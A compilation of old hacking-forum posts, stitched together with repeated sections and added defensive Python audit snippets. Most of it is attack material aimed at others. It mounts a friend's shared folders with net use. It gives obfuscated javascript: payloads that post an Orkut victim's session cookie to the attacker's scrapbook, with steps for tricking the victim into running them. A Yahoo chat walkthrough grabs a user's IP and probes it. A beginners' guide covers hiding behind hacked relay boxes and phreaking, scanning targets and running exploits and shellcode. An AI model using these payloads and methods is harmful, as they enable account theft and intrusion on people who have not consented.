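    {"pid": 900, "path": r"C:\Windows\System32\svchost.exe", "dir_hidden": False},
    {"pid": 1204, "path": r"C:\Users\demo\AppData\Roaming\svchost.exe", "dir_hidden": False},
    {"pid": 1388, "path": r"C:\Windows\System32\scvhost.exe", "dir_hidden": False},
    {"pid": 2040, "path": r"C:\ProgramData\.cache\updater.exe", "dir_hidden": True},
    {"pid": 2312, "path": r"C:\Program Files\Editor\editor.exe", "dir_hidden": False},
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_INVENTORY).items():
        print(pid, ", ".join(findings))
```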
What is left behind
The most dangerous trojan is a "back-door" trojan. A trojan horse program is a way of tricking you to load a program onto your PC that gives a hacker access to your computer.
The name comes from the legend of Troy. Ulysses, enemy of the Trojans, leaves a wooden Trojan horse outside the gates of Troy. The Trojans believing that it is a sacrifice to the gods, bring it inside the walls of the city. What they did not know was that inside the belly of the trojan horse were Greek soldiers. At night, the Greek soldiers snuck out and opened the gates of Troy to the Greek army who then defeated the Trojans.
Software trojans are more clever, often arriving from friends who do not know what is in the cute little program that sings Merry Christmas to you. While you are enjoying the show, a nasty little trojan program could be loaded.
A "back door" trojan gives hackers complete access and control over your PC. They can see your screen, just as if they were sitting in front of it. They can watch every move you make with your mouse, every word you type, like a spy standing over your shoulder. And you will have no idea that they are there. These programs run in stealth mode, silent and deadly.
"Back door" programs are commonly available. They can be tools used to administer remote systems and are used on a daily basis in a legitimate way by system administrators.
When your PC asks you if you would like to save your password to your bank account or other important accounts, SAY NO! This little convenience of not having to remember and type in your password might give a hacker complete access to your bank account.
More often than not, the hacker is not interested in you or your system. He just wants to control your PC to hack into much larger, profitable, head-line creating sites, like government, bank, and popular sites.
One technique hackers use to attack web sites is called a "denial of service attack". The hacker might send a signal to all the PCs he has infected with specialized software. The software, which could be running on hundreds of PCs, simultaneously sends problem messages to the target web server and ties up all its connections so no one new can connect, or crashes the web server, or overloads the mail server with junk mail. The effect is that legitimate customers can no longer access a service or web site. This can cost companies millions of dollars.
If your PC is used in a "Denial of Service" attack, your PC is called a "ZOMBIE". When the targeted site starts to investigate who is attacking their network, they will find your IP address and your computer, not the hacker's (at least initially). You might be held legally responsible.
Did you know that a hacker could be watching you right at this very moment, reading exactly what you are reading right now, and you didn't even know they were there or how they got in?
A hacker can get into your bank account if you save your password on your PC. They can "break" your password using commonly available programs and then change your passwords to your banking accounts and PC effectively locking you out. But they don't even need to "break" your password, if they load the right program on your PC.
They can, and do ...
..steal and delete files,
..load dangerous programs onto your PC,
..involve you in computer crimes.
True story:
A woman gets up in the middle of the night and notices her PC operating all by itself, an invisible hand is controlling her mouse and opening up applications. Thinking that her PC is malfunctioning, she calls the PC manufacturer the next day. Of course, now, the PC is behaving normally. She finds that she has been infected with a commonly available trojan, and she had witnessed the hacker rummaging through her system.
Continue reading and you will learn how they get in ........
These are the 5 steps to a successful "hack".
1. Hackers look for easy targets and find out information about them and their systems.
2. Breaking into your system.
3. Getting authority to control everything on your system.
4. Hiding the evidence of their break-in.
5. They load programs and passwords on your PC to give them easy access in the future.
Scoping Their Target
Every computer that connects to the Internet is assigned an IP (Internet Protocol) address. This is very similar to a telephone number in many ways. If you have a DSL connection or cable modem connection your IP address stays the same and is "always on". If you have a "dial-up" account, then your IP address is dynamic (it changes each time you connect), and your ISP (Internet Service Provider) cuts you off after a certain amount of time of inactivity.
Dial-up accounts are less hacker friendly because your IP address changes each time you are on. This makes it impossible for the hacker to make repeat visits unless he has tricked you into loading a program on your PC that tells him when you are on-line and gives him your current IP address.
"Always on" connections are just that, always connected and open for attack. The hacker can take his time getting to know your system and it's weaknesses, searching until he finds a way in. Your only safety is in the vast numbers of open, unprotected systems.
There are many ways for the hacker to find out what your IP address is. Some of the more common methods are through chat rooms, by looking up domain names on a domain name registrar site, or by running programs that can create a log of all valid addresses.
Chat rooms are the easiest way for hackers to find out your IP address. All they have to do is right click on your chat id and they have your IP address. With your IP address in hand they can start testing your system for weaknesses.
You would be amazed at what information is available from a domain name registrar like Network Solutions. Anyone can type in the name of a domain, for example, Yahoo.com, and find out employee names, phone numbers, fax numbers, physical addresses and IP addresses.
Breaking In
A hacker wants to know your IP address and what operating system you are running. Most home PCs run Windows, so home PC hacking is easy because there are many known Windows "bugs" that can be taken advantage of. Most home users have never worried about computer security.
Hackers look for commonly known system weaknesses (bugs or holes in software). The operating system, like Windows, has bugs, as does other software such as browsers like Microsoft's Internet Explorer. They scan your open ports looking for a running program that they can take advantage of. Scanning is like a burglar who checks all the doors and windows of your house to see if any are unlocked.
Windows 95 and 98 often have the File and Print Sharing option turned on. This allows someone to access your hard drive and load any program they want onto it, or delete or change any file they want on your PC (the next page, Cyber Defense, will show you how to turn this off). This access makes it very easy for a hacker to use your PC as his own.
Hackers often use trojans to break into and control home computers.
One of the most famous hackers, Kevin Mitnick, used social engineering to obtain the information needed to break into systems. Social engineering is where a person wants to find out information about you, so they call you and trick you into telling them what they want to know. They then use that information to break into your or your company's system.
Basically, hackers don't need to know much of anything about you to get into your system. They are counting on the public being uninformed and use that lack of knowledge to gain access to many computers.
Getting Total Control
You may be thinking...
"I don't have to worry, my PC is password protected."
Not true!
PCs used at home did not need a lot of security features before the Internet. They were designed for convenience, not security. Windows 95 and 98 are very insecure. It takes about 10 seconds to bypass any password you have to "lock out" other people from your home PC. Don't make the mistake of thinking that because you have password protected your PC, that it is safe. IT IS NOT SAFE!
Hackers use specialized programs to "crack" passwords. Your password at work or to your bank account can give a hacker much greater control over your life or company than you realize. Choose your password carefully. Please take the time now to read about how hackers "crack" passwords and how to create a good password.
Disposing of the evidence
One way that hackers camouflage their dirty work is by changing the name of their programs to look like program names of legitimate system programs. Or they will create a hidden folder to keep all their programs in.
What is left behind
The most dangerous trojan is a "back-door" trojan. A trojan horse program is a way of tricking you to load a program onto your PC that gives a hacker access to your computer.
The name comes from the legend of Troy. Ulysses, enemy of the Trojans, leaves a wooden Trojan horse outside the gates of Troy. The Trojans believing that it is a sacrifice to the gods, bring it inside the walls of the city. What they did not know was that inside the belly of the trojan horse were Greek soldiers. At night, the Greek soldiers snuck out and opened the gates of Troy to the Greek army who then defeated the Trojans.
Software trojans are more clever, often arriving from friends who do not know what is in the cute little program that sings Merry Christmas to you. While you are enjoying the show, a nasty little trojan program could be loaded.
A "back door" trojan gives hackers complete access and control over your PC. They can see your screen, just as if they were sitting in front of it. They can watch every move you make with your mouse, every word you type, like a spy standing over your shoulder. And you will have no idea that they are there. These programs run in stealth mode, silent and deadly.
"Back door" programs are commonly available. They can be tools used to administer remote systems and are used on a daily basis in a legitimate way by system administrators.
When your PC asks you if you would like to save your password to your bank account or other important accounts, SAY NO! This little convenience of not having to remember and type in your password might give a hacker complete access to your bank account.
More often than not, the hacker is not interested in you or your system. He just wants to control your PC to hack into much larger, profitable, head-line creating sites, like government, bank, and popular sites.
One technique hackers use to attack web sites is called a "denial of service attack". The hacker might send a signal to all the PCs he has infected with specialized software. The software, which could be running on hundreds of PCs, simultaneously sends problem messages to the target web server and ties up all its connections so no one new can connect, or crashes the web server, or overloads the mail server with junk mail. The effect is that legitimate customers can no longer access a service or web site. This can cost companies millions of dollars.
If your PC is used in a "Denial of Service" attack your PC is called a "ZOMBIE". When the targeted site starts to investigate who is attacking their network, they will find your IP address and your computer, not the hacker's. (At least initially) You might be held legally responsible.
Free Calls Anywhere
MAKE FREE CALLS TO ANYWHERE IN THE WORLD
(mobile or landline)
--> Install any of the following...
Gizmo project.... from http://www.gizmoproject.com
Skype.... from http://www.skype.com
Globe7.... from http://www.globe7.com
then dial 18003733411 and follow the instructions...
It's free; no balance is required to call this number.
For details, visit http://www.free411.com
Pc Hacking
Hack Computer Easily (NOOB TRICK)
Posted by Varun in Extreme Hacking
[GEEK]
I will break this down so simple that anyone can do this:
So you get your friend's IP: 192.168.0.1 (example)
1st rule: He does not have COX
2nd rule: He does not have a firewall
3rd rule: You do not have COX
Open a command prompt window
Type Net view \\192.168.0.1
you will see all of his shared folders, documents, etc...
In the command prompt window type:
net use s: \\192.168.0.1\(NAME OF SHARED FOLDER GOES HERE)
It will say command completed successfully
Open My computer
You will now see you have an S: Drive
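Seen from the owner's side, the trick above only works when the File and Print Sharing ports answer to other machines. The following is an added example, not part of the original post: it reads `netstat -an` output from your own PC and reports which sharing ports are reachable and whether another host is already connected to them. The sample output and the address 192.168.0.7 are constructed.

```python
# Constructed sample of `netstat -an` output from a Windows PC (not from the page).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:445          0.0.0.0:0              LISTENING
  TCP    192.168.0.1:139        0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2736       216.136.224.214:5050   ESTABLISHED
  TCP    192.168.0.1:445        192.168.0.7:1044       ESTABLISHED
  TCP    [::]:445               [::]:0                 LISTENING
  UDP    192.168.0.1:137        *:*
  UDP    192.168.0.1:138        *:*
  UDP    127.0.0.1:1900         *:*
"""

# Ports behind File and Print Sharing; these are what answer
# `net view`, `net use` and `nbtstat -A` requests from other machines.
SHARING_PORTS = {
    ("UDP", 137): "NetBIOS name service",
    ("UDP", 138): "NetBIOS datagram service",
    ("TCP", 139): "NetBIOS session service",
    ("TCP", 445): "SMB over TCP",
}
LOOPBACK = {"127.0.0.1", "::1"}


def split_endpoint(endpoint):
    """Split '192.168.0.1:139' or '[::]:445' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def audit(netstat_text):
    """Return (listeners, sessions) for the file-sharing ports.

    listeners: sharing ports bound to a non-loopback address.
    sessions:  remote hosts currently connected to one of those ports.
    """
    listeners, sessions = [], []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue  # banner, column header or blank line
        proto, local, remote = fields[:3]
        state = fields[3] if len(fields) > 3 else ""  # UDP rows have no state
        host, port = split_endpoint(local)
        if not port.isdigit():
            continue
        service = SHARING_PORTS.get((proto, int(port)))
        if service is None or host in LOOPBACK:
            continue  # unrelated port, or only reachable from this PC
        if proto == "UDP" or state == "LISTENING":
            listeners.append((proto, host, int(port), service))
        elif state == "ESTABLISHED":
            # Local port is the sharing port, so the remote side connected to us.
            sessions.append((split_endpoint(remote)[0], int(port), service))
    return listeners, sessions


if __name__ == "__main__":
    found, connected = audit(SAMPLE_NETSTAT)
    for proto, host, port, service in found:
        print(f"exposed: {proto} {host}:{port} ({service})")
    for remote, port, service in connected:
        print(f"connected now: {remote} -> local port {port} ({service})")
```

If either list is non-empty on a machine that connects straight to the Internet, turn File and Print Sharing off or block these ports with a firewall, which is exactly the condition the post's "2nd rule" depends on.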
Orkut Hacking
Hack Orkut Accounts
First get firefox and the cookie editor plugin for it...u will need them...
Then make two fake accounts...u will need one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
U see the 62915936 part? Thats the one u need to edit to get the cookie to your account.....Now here is the script Code:
HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
1) Go to YOUR ALBUM section.
2) Go to ANY photo and right click on it , see the properties of your display image...u will see something like 12345678.jpg
3) There will be a eight digit value.
4) Now put that value in the above javascript.
5) Thats it.
Now your javascript will look like:
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.
Now after getting a cookie...
1) Go to your home page
2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).
3) Type orkut in the text box and click filter/refresh. Look for the orkut_state cookie.
4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...
5) THATS IT!!
ANOTHER SCRIPT : (100%working)
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action='scrapbook.aspx?Action.submit';nobody.submit()
Put ur eight digit number in the place of (53093255)
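Seen from the defender's side, the pasted script hides `document.cookie` behind String.fromCharCode and posts the result as a scrap, so it only works while the session cookie is readable by page script. The following is an added example, not code from the original post or from Orkut: it decodes the obfuscated expression and models the browser rule that a cookie set with HttpOnly is left out of `document.cookie`. The cookie value is constructed.

```python
import re
from http.cookies import SimpleCookie

# The obfuscated expression from the script on this page.
PAGE_SNIPPET = (
    "nobody.scrapText.value=eval(String.fromCharCode("
    "100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));"
)


def decode_fromcharcode(js):
    """Return the plain strings hidden in String.fromCharCode(...) calls."""
    decoded = []
    for args in re.findall(r"String\.fromCharCode\(([\d,\s]+)\)", js):
        decoded.append("".join(chr(int(n)) for n in args.split(",") if n.strip()))
    return decoded


def reads_cookies(js):
    """True if a pasted snippet touches document.cookie, directly or once decoded."""
    return any("document.cookie" in text for text in [js] + decode_fromcharcode(js))


def session_cookie(value, hardened):
    """Build the Set-Cookie header value for the session cookie."""
    cookie = SimpleCookie()
    cookie["orkut_state"] = value
    cookie["orkut_state"]["path"] = "/"
    if hardened:
        cookie["orkut_state"]["httponly"] = True  # hide it from page script
        cookie["orkut_state"]["secure"] = True    # only send it over HTTPS
    return cookie["orkut_state"].OutputString()


def script_visible(set_cookie_values):
    """Model what document.cookie returns: HttpOnly cookies are left out."""
    visible = []
    for header in set_cookie_values:
        parts = [p.strip() for p in header.split(";")]
        attributes = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attributes:
            visible.append(parts[0])
    return "; ".join(visible)


if __name__ == "__main__":
    print("hidden expression:", decode_fromcharcode(PAGE_SNIPPET))
    for hardened in (False, True):
        header = session_cookie("constructed123", hardened)
        print(f"Set-Cookie: {header}")
        print(f"  readable by a pasted script: {script_visible([header])!r}")
```

With the hardened header the script has nothing to send. Users are still protected best by never pasting a `javascript:` line into the address bar, and a site can run a check like `reads_cookies` over text that members post.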
Hack Yahoo While Chatting
HACK YAHOO ID WHILE CHATTING
HACK YAHOO ACCOUNT WHILE CHATTING
This is only for education purposes. So whoever tries this does so at his own risk.
I am not sure that this will work 100 %. But yes, it will work almost 70 percent of the time. But before that you need to know a few things about the Yahoo chat protocol.
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here
Following are the feature : -
1) When we chat on Yahoo, everything goes through the server. Only when we chat, that's messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have a client to client connection, the opponent's IP is revealed. On the 5051 port. So how do we exploit the chat user when he gets a direct connection? And how do we go about it? Remember, I am here to hack a system without using a TOOL, only by simple net commands and Yahoo chat techniques. That's what makes the difference between a real hacker and newbies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why wait? Let's exploit those 50 % chances. I will explain only for files here; the same applies to video or audio.
1) Go to cmd(dos)
type ->
netstat -n 3
You will get the following output. Just do not care and be cool.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
I will just explain what the output is in general. On the left hand side is your IP address. And on the right hand side is the IP address of the foreign machine, and the port to which it is connected. OK, so what next ->
2) Try sending a file to the Target.
If the file comes from the server, that is, the file is uploaded, leave it. You will not get the IP. But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat. The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress. It can happen that if the system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
good luck my friends try it and enjoy!!!!!!!!!!!!!!!!!!!!!!!!!!.
HAPPY HACKING
Hacking For Dummies
How to learn to hack in easy steps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
met. I want to write this because most tutorials i've found (very good tutorials) are now
old and don't fit just like they did before. This is why i'm going to teach you and show you
the way to learn to hack.
If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.
On this document I talk about many security tools, you can find all them and also contact
me on my site: www.3b0x.com
When you finish reading it, please TELL ME how you like it!
I want to make newer versions of it, check on my site to stay informed.
COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responsible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've read the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) have plenty of normal users, who
don't have the remotest idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimum knowledge of a UNIX system, and what's better
than running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.
Let's see where to find the unix you're interested in.
The UNIX systems may be divided in two main groups:
- commercial UNIXes
- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.
The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
Visit www.suse.de and look for a local store or order it online.
(i know i said the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And that vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure whether a modem is a winmodem or not, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux box is now connected to the net.
It's now the turn of the STEALTH. You won't get busted! just follow my advice and you'll be safe.
- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website or email address, find your ISP, your phone number, your home...
and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes
- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)
- Use phreaking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~
Have you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TCP/IP protocol,
(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.
So you can open a connection and send data to any of these ports. Those ports are associated with
a service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
Port number   Common service   Example daemon (d stands for daemon)
21            FTP              FTPd
23            Telnet           telnetd
25            SMTP             sendmail (yes!)
80            HTTP             apache
110           POP3             qpop
Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /luser/index.html HTTP/1.1" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm package.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
So let's see what's on those ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will let the admin detect us.
Avoid uploading it with FTP if you can, use cut&paste instead.
Here's how to do it:
we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.
Then open another terminal (I mean without X Windows: CTRL+ALT+Fx to escape from X Windows to console x,
ALT+Fx to change to another terminal, ALT+F7 to return to X Windows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut text from the screen, you need to install the gpm package from your linux distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.
An exploit is a piece of code that exploits a vulnerability in some software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easily
exploitable. If your target has got an old version, you'll probably get in easily.
When we exploit a security bug, we can get:
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we've got limited privileges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
These are some exploit databases I suggest you visit:
www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html
Every exploit is used differently, so read its text and try it.
They usually come as .c source files.
The most standard and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow works.
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)
Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different for every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
